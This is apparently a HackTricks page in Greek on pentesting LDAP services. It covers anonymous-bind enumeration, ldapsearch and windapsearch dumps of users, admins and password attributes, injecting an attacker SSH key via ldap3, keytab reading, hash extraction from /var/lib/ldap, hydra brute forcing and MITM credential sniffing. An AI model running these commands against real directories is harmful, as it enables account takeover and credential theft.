# 389, 636, 3268, 3269 - Pentesting LDAP {{#include ../banners/hacktricks-training.md}} Η χρήση του **LDAP** (Lightweight Directory Access Protocol) είναι κυρίως για την τοποθέτηση διαφόρων οντοτήτων όπως οργανισμούς, άτομα και πόρους όπως αρχεία και συσκευές εντός δικτύων, τόσο δημόσιων όσο και ιδιωτικών. Προσφέρει μια απλοποιημένη προσέγγιση σε σύγκριση με τον προκάτοχό του, DAP, έχοντας μικρότερο αποτύπωμα κώδικα. Οι καταλόγοι LDAP είναι δομημένοι ώστε να επιτρέπουν τη διανομή τους σε αρκετούς διακομιστές, με κάθε διακομιστή να φιλοξενεί μια **αντιγραμμένη** και **συγχρονισμένη** έκδοση του καταλόγου, που αναφέρεται ως Directory System Agent (DSA). Η ευθύνη για την επεξεργασία των αιτημάτων ανήκει εξ ολοκλήρου στον διακομιστή LDAP, ο οποίος μπορεί να επικοινωνεί με άλλους DSA κατά την ανάγκη για να παραδώσει μια ενιαία απάντηση στον αιτούντα. Η οργάνωση του καταλόγου LDAP μοιάζει με μια **ιεραρχία δέντρου, ξεκινώντας με τον ριζικό κατάλογο στην κορυφή**. Αυτό διακλαδίζεται σε χώρες, οι οποίες χωρίζονται περαιτέρω σε οργανισμούς, και στη συνέχεια σε οργανωτικές μονάδες που αντιπροσωπεύουν διάφορες διευθύνσεις ή τμήματα, φτάνοντας τελικά στο επίπεδο των ατομικών οντοτήτων, συμπεριλαμβανομένων τόσο των ανθρώπων όσο και των κοινών πόρων όπως αρχεία και εκτυπωτές. **Προεπιλεγμένη θύρα:** 389 και 636(ldaps). Ο Παγκόσμιος Κατάλογος (LDAP στο ActiveDirectory) είναι διαθέσιμος από προεπιλογή στις θύρες 3268 και 3269 για LDAPS. ``` PORT STATE SERVICE REASON 389/tcp open ldap syn-ack 636/tcp open tcpwrapped ``` ### LDAP Data Interchange Format LDIF (LDAP Data Interchange Format) ορίζει το περιεχόμενο του καταλόγου ως ένα σύνολο εγγραφών. Μπορεί επίσης να αναπαριστά αιτήματα ενημέρωσης (Προσθήκη, Τροποποίηση, Διαγραφή, Μετονομασία). ```bash dn: dc=local dc: local objectClass: dcObject dn: dc=moneycorp,dc=local dc: moneycorp objectClass: dcObject objectClass: organization dn ou=it,dc=moneycorp,dc=local objectClass: organizationalUnit ou: dev dn: ou=marketing,dc=moneycorp,dc=local objectClass: organizationalUnit Ou: sales dn: cn= ,ou= ,dc=moneycorp,dc=local objectClass: personalData cn: sn: gn: uid: ou: mail: pepe@hacktricks.xyz phone: 23627387495 ``` - Οι γραμμές 1-3 ορίζουν το τοπικό επίπεδο τομέα - Οι γραμμές 5-8 ορίζουν τον πρώτο επίπεδο τομέα moneycorp (moneycorp.local) - Οι γραμμές 10-16 ορίζουν 2 οργανωτικές μονάδες: dev και sales - Οι γραμμές 18-26 δημιουργούν ένα αντικείμενο του τομέα και αναθέτουν χαρακτηριστικά με τιμές ## Γράψτε δεδομένα Σημειώστε ότι αν μπορείτε να τροποποιήσετε τιμές, θα μπορούσατε να εκτελέσετε πραγματικά ενδιαφέρουσες ενέργειες. Για παράδειγμα, φανταστείτε ότι μπορείτε να **αλλάξετε την πληροφορία "sshPublicKey"** του χρήστη σας ή οποιουδήποτε χρήστη. Είναι πολύ πιθανό ότι αν αυτό το χαρακτηριστικό υπάρχει, τότε **το ssh διαβάζει τα δημόσια κλειδιά από το LDAP**. Αν μπορείτε να τροποποιήσετε το δημόσιο κλειδί ενός χρήστη, **θα μπορείτε να συνδεθείτε ως αυτός ο χρήστης ακόμα και αν η αυθεντικοποίηση με κωδικό πρόσβασης δεν είναι ενεργοποιημένη στο ssh**. ```bash # Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/ >>> import ldap3 >>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True) >>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True) >>> connection.bind() True >>> connection.extend.standard.who_am_i() u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN' >>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]}) ``` ## Sniff clear text credentials Αν το LDAP χρησιμοποιείται χωρίς SSL, μπορείτε να **sniff credentials σε απλό κείμενο** στο δίκτυο. Επίσης, μπορείτε να εκτελέσετε μια **MITM** επίθεση στο δίκτυο **μεταξύ του LDAP server και του πελάτη.** Εδώ μπορείτε να κάνετε μια **Downgrade Attack** ώστε ο πελάτης να χρησιμοποιήσει τα **credentials σε απλό κείμενο** για να συνδεθεί. **Αν χρησιμοποιείται SSL** μπορείτε να προσπαθήσετε να κάνετε **MITM** όπως αναφέρθηκε παραπάνω, προσφέροντας ένα **ψευδές πιστοποιητικό**, αν ο **χρήστης το αποδεχτεί**, μπορείτε να υποβαθμίσετε τη μέθοδο αυθεντικοποίησης και να δείτε ξανά τα credentials. ## Anonymous Access ### Bypass TLS SNI check Σύμφωνα με [**αυτή τη γραφή**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) απλά με την πρόσβαση στον LDAP server με ένα αυθαίρετο όνομα τομέα (όπως company.com) κατάφερε να επικοινωνήσει με την υπηρεσία LDAP και να εξάγει πληροφορίες ως ανώνυμος χρήστης: ```bash ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" + ``` ### LDAP ανώνυμες συνδέσεις [LDAP ανώνυμες συνδέσεις](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) επιτρέπουν σε **μη αυθεντικοποιημένους επιτιθέμενους** να ανακτούν πληροφορίες από το domain, όπως μια πλήρη λίστα χρηστών, ομάδων, υπολογιστών, χαρακτηριστικών λογαριασμού χρηστών και την πολιτική κωδικών πρόσβασης του domain. Αυτή είναι μια **παλαιά ρύθμιση**, και από το Windows Server 2003, μόνο οι αυθεντικοποιημένοι χρήστες επιτρέπεται να ξεκινούν αιτήματα LDAP.\ Ωστόσο, οι διαχειριστές μπορεί να χρειάστηκε να **ρυθμίσουν μια συγκεκριμένη εφαρμογή για να επιτρέψουν ανώνυμες συνδέσεις** και να έχουν δώσει περισσότερη πρόσβαση από την προοριζόμενη, δίνοντας έτσι σε μη αυθεντικοποιημένους χρήστες πρόσβαση σε όλα τα αντικείμενα στο AD. ## Έγκυρα Διαπιστευτήρια Αν έχετε έγκυρα διαπιστευτήρια για να συνδεθείτε στον LDAP server, μπορείτε να εξάγετε όλες τις πληροφορίες σχετικά με τον Domain Admin χρησιμοποιώντας: [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) ```bash pip3 install ldapdomaindump ldapdomaindump [-r ] -u '\' -p '' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir] ``` ### [Brute Force](../generic-hacking/brute-force.md#ldap) ## Enumeration ### Automated Using this you will be able to see the **δημόσιες πληροφορίες** (like the domain name)**:** ```bash nmap -n -sV --script "ldap* and not brute" #Using anonymous credentials ``` ### Python
Δείτε την αρίθμηση LDAP με python Μπορείτε να προσπαθήσετε να **αριθμήσετε ένα LDAP με ή χωρίς διαπιστευτήρια χρησιμοποιώντας python**: `pip3 install ldap3` Πρώτα προσπαθήστε να **συνδεθείτε χωρίς** διαπιστευτήρια: ```bash >>> import ldap3 >>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True) >>> connection = ldap3.Connection(server) >>> connection.bind() True >>> server.info ``` Αν η απάντηση είναι `True` όπως στο προηγούμενο παράδειγμα, μπορείτε να αποκτήσετε κάποια **ενδιαφέροντα δεδομένα** από τον LDAP (όπως το **naming context** ή το **domain name**) server από: ```bash >>> server.info DSA info (from DSE): Supported LDAP versions: 3 Naming contexts: dc=DOMAIN,dc=DOMAIN ``` Μόλις έχετε το naming context, μπορείτε να κάνετε μερικά πιο ενδιαφέροντα ερωτήματα. Αυτό το απλό ερώτημα θα σας δείξει όλα τα αντικείμενα στον κατάλογο: ```bash >>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*') True >> connection.entries ``` Ή **dump** ολόκληρο το ldap: ```bash >> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword') True >>> connection.entries ```
### windapsearch [**Windapsearch**](https://github.com/ropnop/windapsearch) είναι ένα σενάριο Python χρήσιμο για **καταμέτρηση χρηστών, ομάδων και υπολογιστών από ένα Windows** domain χρησιμοποιώντας LDAP ερωτήματα. ```bash # Get computers python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers # Get groups python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups # Get users python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da # Get Domain Admins python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da # Get Privileged Users python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users ``` ### ldapsearch Ελέγξτε αν οι κωδικοί πρόσβασης είναι κενές ή αν οι κωδικοί σας είναι έγκυροι: ```bash ldapsearch -x -H ldap:// -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=" ldapsearch -x -H ldap:// -D '\' -w '' -b "DC=<1_SUBDOMAIN>,DC=" ``` ```bash # CREDENTIALS NOT VALID RESPONSE search: 2 result: 1 Operations error text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera tion a successful bind must be completed on the connection., data 0, v3839 ``` Αν βρείτε κάτι που λέει ότι το "_bind must be completed_" σημαίνει ότι τα διαπιστευτήρια είναι λανθασμένα. Μπορείτε να εξάγετε **τα πάντα από ένα domain** χρησιμοποιώντας: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "DC=<1_SUBDOMAIN>,DC=" -x Simple Authentication -H LDAP Server -D My User -w My password -b Base site, all data from here will be given ``` Εξαγωγή **χρηστών**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=" #Example: ldapsearch -x -H ldap:// -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local" ``` Εξαγωγή **υπολογιστών**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=" ``` Ανακτήστε **τις πληροφορίες μου**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` Εξαγωγή **Domain Admins**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` Εξαγωγή **Domain Users**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` Εξαγωγή **Enterprise Admins**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` Εξαγωγή **Διαχειριστών**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=" ``` Αποσπάστε **Remote Desktop Group**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=" ``` Για να δείτε αν έχετε πρόσβαση σε κάποιον κωδικό πρόσβασης, μπορείτε να χρησιμοποιήσετε το grep μετά την εκτέλεση ενός από τους ερωτήσεις: ```bash | grep -i -A2 -B2 "userpas" ``` Παρακαλώ σημειώστε ότι οι κωδικοί πρόσβασης που μπορείτε να βρείτε εδώ μπορεί να μην είναι οι πραγματικοί... #### pbis Μπορείτε να κατεβάσετε το **pbis** από εδώ: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) και συνήθως εγκαθίσταται στο `/opt/pbis`.\ Το **Pbis** σας επιτρέπει να αποκτάτε βασικές πληροφορίες εύκολα: ```bash #Read keytab file ./klist -k /etc/krb5.keytab #Get known domains info ./get-status ./lsa get-status #Get basic metrics ./get-metrics ./lsa get-metrics #Get users ./enum-users ./lsa enum-users #Get groups ./enum-groups ./lsa enum-groups #Get all kind of objects ./enum-objects ./lsa enum-objects #Get groups of a user ./list-groups-for-user ./lsa list-groups-for-user #Get groups of each user ./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done #Get users of a group ./enum-members --by-name "domain admins" ./lsa enum-members --by-name "domain admins" #Get users of each group ./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done #Get description of each user ./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n | grep "CN" | while read line; do echo "$line"; ./adtool --keytab=/etc/krb5.keytab -n -a lookup-object --dn="$line" --attr "description"; echo "======================" done ``` ## Γραφική Διεπαφή ### Apache Directory [**Κατεβάστε το Apache Directory από εδώ**](https://directory.apache.org/studio/download/download-linux.html). Μπορείτε να βρείτε ένα [παράδειγμα για το πώς να χρησιμοποιήσετε αυτό το εργαλείο εδώ](https://www.youtube.com/watch?v=VofMBg2VLnw&t=3840s). ### jxplorer Μπορείτε να κατεβάσετε μια γραφική διεπαφή με LDAP server εδώ: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html) Από προεπιλογή εγκαθίσταται στο: _/opt/jxplorer_ ![](<../images/image (482).png>) ### Godap Το Godap είναι μια διαδραστική διεπαφή χρήστη τερματικού για LDAP που μπορεί να χρησιμοποιηθεί για αλληλεπίδραση με αντικείμενα και χαρακτηριστικά σε AD και άλλους LDAP servers. Είναι διαθέσιμο για Windows, Linux και MacOS και υποστηρίζει απλές συνδέσεις, pass-the-hash, pass-the-ticket & pass-the-cert, μαζί με πολλές άλλες εξειδικευμένες δυνατότητες όπως αναζήτηση/δημιουργία/αλλαγή/διαγραφή αντικειμένων, προσθήκη/αφαίρεση χρηστών από ομάδες, αλλαγή κωδικών πρόσβασης, επεξεργασία δικαιωμάτων αντικειμένων (DACLs), τροποποίηση Active-Directory Integrated DNS (ADIDNS), εξαγωγή σε αρχεία JSON, κ.λπ. ![](../images/godap.png) Μπορείτε να το αποκτήσετε από [https://github.com/Macmod/godap](https://github.com/Macmod/godap). Για παραδείγματα χρήσης και οδηγίες διαβάστε το [Wiki](https://github.com/Macmod/godap/wiki). ### Ldapx Το Ldapx είναι ένα ευέλικτο LDAP proxy που μπορεί να χρησιμοποιηθεί για να επιθεωρήσει & να μετασχηματίσει την κίνηση LDAP από άλλα εργαλεία. Μπορεί να χρησιμοποιηθεί για να αποκρύψει την κίνηση LDAP για να προσπαθήσει να παρακάμψει τα εργαλεία προστασίας ταυτότητας & παρακολούθησης LDAP και υλοποιεί τις περισσότερες από τις μεθόδους που παρουσιάζονται στην ομιλία [MaLDAPtive](https://www.youtube.com/watch?v=mKRS5Iyy7Qo). ![](../images/ldapx.png) Μπορείτε να το αποκτήσετε από [https://github.com/Macmod/ldapx](https://github.com/Macmod/ldapx). ## Αυθεντικοποίηση μέσω kerberos Χρησιμοποιώντας το `ldapsearch` μπορείτε να **αυθεντικοποιηθείτε** μέσω **kerberos αντί** για **NTLM** χρησιμοποιώντας την παράμετρο `-Y GSSAPI` ## POST Αν μπορείτε να έχετε πρόσβαση στα αρχεία όπου περιέχονται οι βάσεις δεδομένων (μπορεί να είναι στο _/var/lib/ldap_). Μπορείτε να εξάγετε τους κατακερματισμούς χρησιμοποιώντας: ```bash cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u ``` Μπορείτε να τροφοδοτήσετε τον john με το hash του κωδικού πρόσβασης (από '{SSHA}' έως 'structural' χωρίς να προσθέσετε 'structural'). ### Αρχεία Ρυθμίσεων - Γενικά - containers.ldif - ldap.cfg - ldap.conf - ldap.xml - ldap-config.xml - ldap-realm.xml - slapd.conf - IBM SecureWay V3 server - V3.sas.oc - Microsoft Active Directory server - msadClassesAttrs.ldif - Netscape Directory Server 4 - nsslapd.sas_at.conf - nsslapd.sas_oc.conf - OpenLDAP directory server - slapd.sas_at.conf - slapd.sas_oc.conf - Sun ONE Directory Server 5.1 - 75sas.ldif ## HackTricks Αυτόματες Εντολές ``` Protocol_Name: LDAP #Protocol Abbreviation if there is one. Port_Number: 389,636 #Comma separated if there is more than one. Protocol_Description: Lightweight Directory Access Protocol #Protocol Abbreviation Spelled out Entry_1: Name: Notes Description: Notes for LDAP Note: | The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint. https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ldap.html Entry_2: Name: Banner Grab Description: Grab LDAP Banner Command: nmap -p 389 --script ldap-search -Pn {IP} Entry_3: Name: LdapSearch Description: Base LdapSearch Command: ldapsearch -H ldap://{IP} -x Entry_4: Name: LdapSearch Naming Context Dump Description: Attempt to get LDAP Naming Context Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts Entry_5: Name: LdapSearch Big Dump Description: Need Naming Context to do big dump Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}" Entry_6: Name: Hydra Brute Force Description: Need User Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f Entry_7: Name: Netexec LDAP BloodHound Command: nxc ldap -u -p --bloodhound -c All -d --dns-server --dns-tcp ``` {{#include ../banners/hacktricks-training.md}}